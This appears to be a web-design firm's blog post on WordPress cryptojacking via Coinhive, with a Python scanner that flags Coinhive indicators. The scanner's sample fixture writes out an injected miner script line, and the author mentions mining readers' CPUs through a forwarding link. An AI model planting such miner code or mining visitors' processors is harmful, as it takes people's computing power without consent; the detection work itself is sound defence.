If you own or maintain a WordPress website, you may have recently received information that rogue agents are uploading cryptocurrency mining software. As a Birmingham website designer, we thought we’d let our current clients and other people know more information about the attack.

So what is cryptocurrency mining? Well for those who haven’t seen the hype, cryptocurrency is a digital form of exchange that had its concept proven with the now infamous Bitcoin. Cryptocurrencies are usually decentralised systems, which means governments or other institutions are unable to stop their operation. They stay decentralised through individual computers running software to maintain their digital ledger of transactions. The computers use processing power to complete a series of math problems and the one that succeeds first is rewarded with cryptocurrency. The process is termed “mining” as it is essentially obtaining reward through the process.

The story of mining is reflective of the wider political processes associated with cryptocurrency. When cryptocurrencies were unheard of, the difficulty of the mining process was low, and therefore individuals could mine cryptocurrency on their individual computers. As more people mine a cryptocurrency, mining becomes more difficult and therefore requires more computing power. With Bitcoin this has resulted in highly centralised operations requiring extensive capital investments in processing power. It sort of defeats the point of Bitcoin, as the decentralisation has resulted in greater centralisation, with only a few groups having access to the capacity to mine competitively.

The requirement of more processing power is where the WordPress attack comes in. Individuals have become quite ingenious at working out methods of using other people’s computing power to mine for cryptocurrency. One of the most famous approaches was through the torrent site uTorrent. Back in 2015 they were using the computing power of the people who downloaded their software to mine for cryptocurrency. They were doing it quite blatantly as well, stating the fact in the terms and conditions. Users would download uTorrent to share their favourite pirated material, and as uTorrent used some processing power anyway, they did not notice the extra used for cryptocurrency mining. uTorrent would then reap the rewards of their users’ processing power. The approach applied by uTorrent is now widespread. Only recently Pirate Bay and Showtime have been caught secretly mining cryptocurrency using the computing power of visitors to their sites, with some experts estimating 500 million computers are infected. The recent WordPress attack is basically miners getting access to your backend, installing mining software and using your visitors’ processing capacity to obtain cryptocurrency.

To give you an example of how this works: Coinhive is a service where you can attach mining software for the cryptocurrency Monero to links, websites or even verification processes. There are legitimate reasons to do this: spam protection and revenue from link forwarding. The link provided above goes through a forwarding process where I mine cryptocurrency from your processor, before you access the site. It only works in certain situations; there is no point in doing it if someone is going to access the link via their mobile phone, as the processing power is so low. Which is probably why Pirate Bay are using it, as most people access their sites with PCs. Here’s the Coinhive link without the mining process.

So how do you recognise it within your own WordPress site? Well basically it comes down to how secure your site is. Firstly, ensure that admin passwords are strong, as this attack is unusual. Once they gain access to your site and install the mining software, they will leave everything looking normal. They do not want you to become suspicious about an attack; they want to mine cryptocurrency from your users. A strong password is 16+ letters, numbers and symbols. Secondly, run WordPress security plugins that ensure that your site is protected. A free one is Wordfence. Coinhive is a line of code, as opposed to an addition you will recognise in your usual menu, so you will need scans to find it. Wordfence is now aware of the attack and you will get the following warning if someone is using Coinhive to mine using your site:

If you want a less intrusive method to see if you have been hacked, we would recommend the free service GravityScan. This analyses your site externally and looks for malware. The error message for this system looks like this:

Finally, we must be aware that attacks in this way are basically an arms race. Once we realise how to stop one method, attackers are using a different method. One of the ways to identify if your site is being used to mine for cryptocurrency is a reduction in site performance. If the site takes a very long time to load up, especially on mobile phones, without explanation, it is worth investigating.
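Because Coinhive sits in your site as a line of code rather than a visible menu item, a scan has to look inside theme and plugin files. The following sketch is an added example, not part of Wordfence or GravityScan: it walks a WordPress directory and reports lines that reference the Coinhive script, host or JavaScript API. The indicator list, the sample theme files and the `SITE_KEY_PLACEHOLDER` value are constructed for illustration, and renamed or obfuscated copies will not match.

```python
import os
import re
import tempfile

# Strings associated with the Coinhive in-browser miner (assumed list, not
# exhaustive; an obfuscated or self-hosted copy needs other checks).
INDICATORS = {
    "coinhive-script": re.compile(r"coinhive(\.min)?\.js", re.I),
    "coinhive-host": re.compile(r"\bcoin-?hive\.com\b", re.I),
    "coinhive-api": re.compile(r"\bCoinHive\.(Anonymous|User)\s*\("),
}
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")

def scan_text(text):
    """Return sorted (line_number, indicator_name) pairs found in text."""
    return sorted((n, name) for n, line in enumerate(text.splitlines(), 1)
                  for name, rx in INDICATORS.items() if rx.search(line))

def scan_tree(root):
    """Walk a WordPress directory and map relative file path -> hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fname)
            # errors="replace" keeps the scan going on odd encodings
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def build_sample_site(root):
    """Constructed sample: one clean theme file, one with an injected miner."""
    theme = os.path.join(root, "wp-content", "themes", "example")
    os.makedirs(theme)
    with open(os.path.join(theme, "footer.php"), "w") as fh:
        fh.write("<?php wp_footer(); ?>\n</body>\n</html>\n")
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write('<head>\n<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
                 "<script>new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER').start();</script>\n</head>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for path, hits in scan_tree(site).items():
            print(path, hits)
```

Point `scan_tree` at a copy of your own `wp-content` directory; a hit tells you where the code sits, not how the attacker got in.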

So what to do if you have been attacked? I’m sorry, this is where the blog may sound a little sales-pitchy, but there is no other way. Ultimately there are three problems that need investigating: how the attackers gained access, where the code is now situated and what the best method for removing it is. This process is bespoke to your website and cannot be explained in a blog. If you fear you are infected, either contact your website provider or contact us. As a Birmingham website designer, we would be happy to advise you on solving your issue.

Thanks for reading.